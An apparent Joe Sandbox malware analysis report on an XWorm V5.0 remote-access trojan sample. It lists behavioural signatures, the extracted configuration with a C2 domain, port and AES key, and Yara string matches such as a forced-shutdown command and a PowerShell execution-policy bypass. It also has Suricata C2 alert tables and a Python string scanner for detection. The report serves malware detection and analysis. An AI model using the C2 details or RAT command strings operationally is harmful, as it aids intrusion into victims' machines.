
Windows Analysis Report
1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe

Overview

General Information

Sample name: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe
Analysis ID: 1652322
MD5: 919d580a19380debbf5159ec58c35562
SHA1: 6ec5d5f491148e4891666dedbce2f7f5976e59d6
SHA256: 877cbf41e73553688fed3a860de3bdaf5697a591ae9525469b00242137eaaa15
Tags: base64-decoded, exe, user-abuse_ch

Detection

XWorm
Score: 100 (range 0 - 100)
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Contains functionality to log keystrokes (.Net Source)
Joe Sandbox ML detected suspicious sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Uses dynamic DNS services
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

[Classification chart: Joe Sandbox category radar with axes Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; scale clean / suspicious / malicious]

Analysis environment
  • System is w10x64
  • cleanup

Malware Configuration
{
  "C2 url": [
    "jeggawire.ddns.net"
  ],
  "Port": 1111,
  "Aes key": "<123456789>",
  "SPL": "<Xwormmm>",
  "Install file": "USB.exe",
  "Version": "XWorm V5.0"
}
Yara matches (sample file)
Source | Rule | Description | Author
1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | rat_win_xworm_v3 | Finds XWorm (version XClient, v3) samples based on characteristic strings | Sekoia.io
  Strings:
  • 0x6377: $str01: $VB$Local_Port
  • 0x6368: $str02: $VB$Local_Host
  • 0x6662: $str03: get_Jpeg
  • 0x6027: $str04: get_ServicePack
  • 0x70ea: $str05: Select * from AntivirusProduct
  • 0x72e8: $str06: PCRestart
  • 0x72fc: $str07: shutdown.exe /f /r /t 0
  • 0x73ae: $str08: StopReport
  • 0x7384: $str09: StopDDos
  • 0x747a: $str10: sendPlugin
  • 0x7618: $str12: -ExecutionPolicy Bypass -File "
  • 0x7741: $str13: Content-length: 5235
1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  Strings:
  • 0x79ae: $cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x7a4b: $cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x7b60: $cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x765c: $cnc4: POST / HTTP/1.1

Yara matches (memory dumps)
Source | Rule | Description | Author
00000000.00000000.840308538.00000000005D2000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000000.00000000.840308538.00000000005D2000.00000002.00000001.01000000.00000003.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  Strings:
  • 0x77ae: $cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x784b: $cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x7960: $cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x745c: $cnc4: POST / HTTP/1.1
00000000.00000002.3288796136.00000000029C1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
Process Memory Space: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe PID: 6920 | JoeSecurity_XWorm | Yara detected XWorm | Joe Security

Yara matches (unpacked PEs)
Source | Rule | Description | Author
0.0.1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe.5d0000.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
0.0.1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe.5d0000.0.unpack | rat_win_xworm_v3 | Finds XWorm (version XClient, v3) samples based on characteristic strings | Sekoia.io
  Strings:
  • 0x6377: $str01: $VB$Local_Port
  • 0x6368: $str02: $VB$Local_Host
  • 0x6662: $str03: get_Jpeg
  • 0x6027: $str04: get_ServicePack
  • 0x70ea: $str05: Select * from AntivirusProduct
  • 0x72e8: $str06: PCRestart
  • 0x72fc: $str07: shutdown.exe /f /r /t 0
  • 0x73ae: $str08: StopReport
  • 0x7384: $str09: StopDDos
  • 0x747a: $str10: sendPlugin
  • 0x7618: $str12: -ExecutionPolicy Bypass -File "
  • 0x7741: $str13: Content-length: 5235
0.0.1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe.5d0000.0.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  Strings:
  • 0x79ae: $cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x7a4b: $cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x7b60: $cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x765c: $cnc4: POST / HTTP/1.1

Note on the rule set: rat_win_xworm_v3 is written for the XClient v3 build, yet every one of its listed strings is still present in this sample, whose extracted configuration reports "XWorm V5.0"; the string set has survived the version bump. MALWARE_Win_AsyncRAT fires only on the four $cnc strings (three browser User-Agent values and "POST / HTTP/1.1"), which XWorm shares with AsyncRAT; it does not indicate a second family in the sample, and the family verdict rests on the XWorm-specific rules and the extracted configuration.
            No Sigma rule has matched
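The rat_win_xworm_v3 hits above are plain string matches: each $strNN is a literal that the scanner located at a byte offset in the file. The Python below is an added example, not part of the Joe Sandbox report and not Sekoia's rule; it reproduces that kind of check the way Yara's ascii/wide modifiers do, over a constructed buffer (the real sample is not included). The "5 of them" threshold is an assumption for illustration, since the page does not show the real rule's condition.

```python
import re
from dataclasses import dataclass

# Characteristic strings copied from the rat_win_xworm_v3 hits listed in the report.
XWORM_STRINGS = {
    "str01": "$VB$Local_Port",
    "str02": "$VB$Local_Host",
    "str03": "get_Jpeg",
    "str04": "get_ServicePack",
    "str05": "Select * from AntivirusProduct",
    "str06": "PCRestart",
    "str07": "shutdown.exe /f /r /t 0",
    "str08": "StopReport",
    "str09": "StopDDos",
    "str10": "sendPlugin",
    "str12": '-ExecutionPolicy Bypass -File "',
    "str13": "Content-length: 5235",
}


@dataclass(frozen=True)
class Hit:
    name: str       # $strNN identifier
    offset: int     # byte offset in the scanned buffer
    encoding: str   # "ascii" or "wide" (UTF-16LE), as Yara names them


def scan(buf: bytes, strings: dict[str, str] = XWORM_STRINGS) -> list[Hit]:
    """Find every occurrence of each string in ascii and in UTF-16LE ('wide') form.

    .NET assemblies keep metadata names (e.g. $VB$Local_Port) as UTF-8 in the
    #Strings heap but user literals (e.g. the WMI query) as UTF-16LE in the #US
    heap, so a scanner that checks only one encoding misses half the indicators.
    """
    hits: list[Hit] = []
    for name, text in strings.items():
        for encoding, needle in (("ascii", text.encode("ascii")),
                                 ("wide", text.encode("utf-16-le"))):
            for m in re.finditer(re.escape(needle), buf):
                hits.append(Hit(name, m.start(), encoding))
    return sorted(hits, key=lambda h: h.offset)


def evaluate(buf: bytes, threshold: int = 5) -> tuple[bool, list[Hit]]:
    """Rule-style verdict: True when at least `threshold` distinct strings occur.

    The threshold is an assumption for this example; the report does not show
    the condition of the real Sekoia rule.
    """
    hits = scan(buf)
    distinct = {h.name for h in hits}
    return len(distinct) >= threshold, hits


def build_sample() -> bytes:
    """Constructed test buffer (not the real sample): a 64-byte stub followed by
    indicators, some as ascii metadata names and some as UTF-16LE user strings."""
    parts = [
        b"MZ" + b"\x00" * 62,                                   # offset 0, 64-byte stub
        b"$VB$Local_Host\x00",                                   # offset 64, ascii
        b"$VB$Local_Port\x00",                                   # offset 79, ascii
        b"get_ServicePack\x00",                                  # offset 94, ascii
        "Select * from AntivirusProduct".encode("utf-16-le"),    # offset 110, wide
        "shutdown.exe /f /r /t 0".encode("utf-16-le"),          # offset 170, wide
        b"PCRestart\x00",                                        # offset 216, ascii
        b"\x00" * 32,
    ]
    return b"".join(parts)


if __name__ == "__main__":
    verdict, found = evaluate(build_sample())
    print("match" if verdict else "no match")
    for h in found:
        print(f"0x{h.offset:04x}: ${h.name} ({h.encoding})")
```

Run against a real file by passing its bytes to evaluate(); the offsets it prints are file offsets, directly comparable with the 0x6377-style values in the table above.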
Suricata IDS alerts: SID 2852870 (ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes)
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-30T21:28:30.618078+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:28:37.026992+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:28:50.076928+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:28:57.616715+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:29:03.141015+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:29:16.201894+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:29:25.297158+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:29:27.616448+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:29:30.973164+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:29:31.199153+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:29:41.667276+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:29:44.238782+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:29:46.559500+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:29:46.791098+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:29:50.584427+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:29:52.485613+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:29:52.716309+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:29:56.172156+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:30:02.900388+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:30:03.446405+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:30:07.468590+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:30:14.659168+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:30:15.717930+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:30:19.097059+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:30:19.336909+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:30:23.220897+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:30:27.607442+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:30:28.024230+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:30:29.747415+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:30:39.983246+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:30:42.541377+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:30:42.772653+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:30:45.185681+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:30:45.672018+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:30:49.039359+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:30:50.222627+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:30:50.449491+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:30:53.515036+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:30:54.642100+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:30:55.975443+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:30:56.202106+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:30:56.661536+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:30:57.481385+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:30:57.713540+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:30:59.642080+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:31:01.764395+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:31:01.994939+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:31:12.294902+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:31:12.914985+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:31:13.543507+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:31:22.333521+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:31:22.563340+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:31:26.705027+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:31:27.613966+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:31:38.775615+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:31:42.651107+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:31:44.847444+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:31:47.839116+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:31:48.077092+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:31:48.304570+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:31:50.543294+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:31:52.612713+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:31:53.127478+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:31:54.308826+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:31:54.532671+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:31:57.611278+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:31:59.705194+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:32:05.022729+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
2025-03-30T21:32:05.249310+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.65.134.56 | 1111 | 192.168.2.8 | 49682 | TCP
Suricata IDS alerts: SID 2852923 (ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client))
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-30T21:28:37.037271+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:28:50.079672+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:29:03.143741+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:29:16.206043+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:29:25.305031+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:29:31.199420+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:29:31.426712+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:29:41.671826+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:29:44.240550+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:29:46.791192+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:29:47.083092+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:29:50.586100+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:29:52.716415+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:29:52.993486+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:29:56.179138+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:29:56.641580+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:29:57.915595+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:30:03.446534+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:30:03.668617+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:30:07.471577+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:30:14.661452+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:30:15.720319+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:30:19.337148+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:30:19.559107+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:30:23.222640+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:30:27.947299+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:30:29.749554+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:30:39.986702+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:30:42.775637+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:30:43.058511+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:30:45.187364+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:30:45.674464+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:30:49.045533+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:30:50.449918+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:30:50.679773+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:30:53.517397+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:30:54.643756+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:30:56.202178+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:30:56.941051+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:30:57.483321+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:30:59.643915+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:31:01.995006+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:31:02.396424+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:31:12.418241+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:31:12.919282+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:31:13.545173+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:31:13.920319+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:31:22.563528+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:31:22.794099+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:31:26.708183+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:31:38.779465+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
2025-03-30T21:31:42.712842+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49682 | 176.65.134.56 | 1111 | TCP
